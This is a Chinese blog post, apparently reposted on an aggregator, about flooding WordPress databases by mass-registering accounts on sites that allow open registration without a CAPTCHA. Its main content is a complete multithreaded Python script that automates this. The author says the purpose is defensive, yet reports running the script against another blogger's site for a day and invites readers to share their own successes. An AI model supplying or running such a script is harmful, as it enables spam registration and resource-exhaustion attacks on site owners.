如何刷爆wordpress的数据库
来源:互联网 发布:无线网卡 通道 知乎 编辑:程序博客网 时间:2024/06/15 12:48
本文来源地址:http://www.xujh.top/2017/11/18/2386/
用过wordpress建站程序的朋友应该都知道,建的站点可以接受人们的注册,而某些站点往往做的比较垃圾,不设置什么验证,本文的思路就是基于此漏洞,以后会教大家如何识别网站可能弹出的验证码。
本文的目的在于揭示这个漏洞,并教那些和我一样的小白站长一定要注意网站的安全问题,因为数据是最重要的。本文并不是教大家如何去攻击,请大家遵守法律!!!
测试效果(最新更新)
下图是我这个程序将线程开到30,跑了一天后,目标网站的博主发的,仅供参考。
目的
利用python编写脚本来批量注册使用wordpress搭建的用户,来刷爆目标站点的数据库,注意,网站一定要开启注册才能使用本教程的方法。
[reply]
如果你的wordpress站点如下图开启了注册功能,并没有验证码之类的东西,那就请继续看下去,我会在以后的文章中更新有验证码的情况下的解决办法:
分析
1.打开浏览器F12分析网页数据
2.在注册页面输入注册信息
3.点击注册按钮,并观察网页请求
4.分析网页请求的请求头和参数:
编写程序
# coding:utf-8 -*-# coding:utf-8 -*-import randomimport requestsimport threadingimport randomthreads = []thread_num = 2def zhuce():url = "https://www.xujh.top/wp-login.php?action=register"UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0"header = { "User-Agent" : UA } wp_session = requests.Session()f = wp_session.get(url,headers=header)#print f.textuser = str(random.randint(0,999999999999))email = user + '@qq.com'postData = { 'user_login': user, 'user_email': email, 'password': '123123123', 'repeat_password': '123123123', 'are_you_human': '我是傻逼', 'redirect_to': '', 'wp-submit': '注册' } wp_session.post(url, data = postData, headers = header) f = wp_session.get('https://www.xujh.top/wp-login.php?checkemail=registered',headers=header)with open('log.txt', 'a+') as f:f.write(user)f.write('\n')def start():for i in xrange(thread_num):thread = threading.Thread(target=zhuce, args=())threads.append(thread) for t in threads:t.start()while True:if (len(threading.enumerate()) < thread_num): breakstart()
程序分析:
此程序是我用我的博客为例子,大家如果照抄运行的话肯定是不行的,具体的博客请具体分析网页的数据,方法已经在此文章中给出,程序哪里不会的请在下方留言,或者加群交流。
程序效果
此程序现在还在我的一台非常垃圾的vps上运行中,截至发文章时,一共批量注册了1570个用户,具体攻击效果以后更新,如果各位水友测试成功了可以在下方留言哦!
[/reply]
阅读全文
0 0
- 如何刷爆wordpress的数据库
- wordpress数据库的启发
- 如何删除wordpress侧边栏功能的wordpress.org链接
- WordPress搬家之数据库的转移
- wordpress 数据库操作用的函数。
- wordpress 导入数据库的几种方法
- 无插件清理WordPress数据库的方法
- 如何在WordPress中自定义PHP页面并操作数据库?
- 如何获取wordpress分类目录的ID呢
- Wordpress如何完整搬家的经验分享
- WordPress 主题框架是如何工作的
- 如何加速您的Wordpress网站
- wordpress如何插入自定义的微博秀
- wordpress如何获得当前用户的头像
- wordpress如何简单的隐藏后台位置?
- 如何在文章页以外调用wordpress文章的第一条,最好是系统函数 而不是数据库调用
- WordPress的数据库操作类$wpdb方法的应用
- Wordpress-数据库结构分析
- centos下安装pip时失败
- ecilpse配置jvm内存大小
- [随手写一个] 字符串实现
- IDEA注册
- 记一次RegionServer节点的宕机事故[hbase1.1.2]
- 如何刷爆wordpress的数据库
- java二分法查找
- Spark升级到2.0后测试stream-kafka测试报java.lang.NoClassDefFoundError: org/apache/spark/Logging错误
- 剑指offer—整数中1的个数
- 06-图2 Saving James Bond
- 构造函数
- python 登陆接口 作业1
- 新一代
- CCSv7使用指南连载7:如何编译生成.lib静态库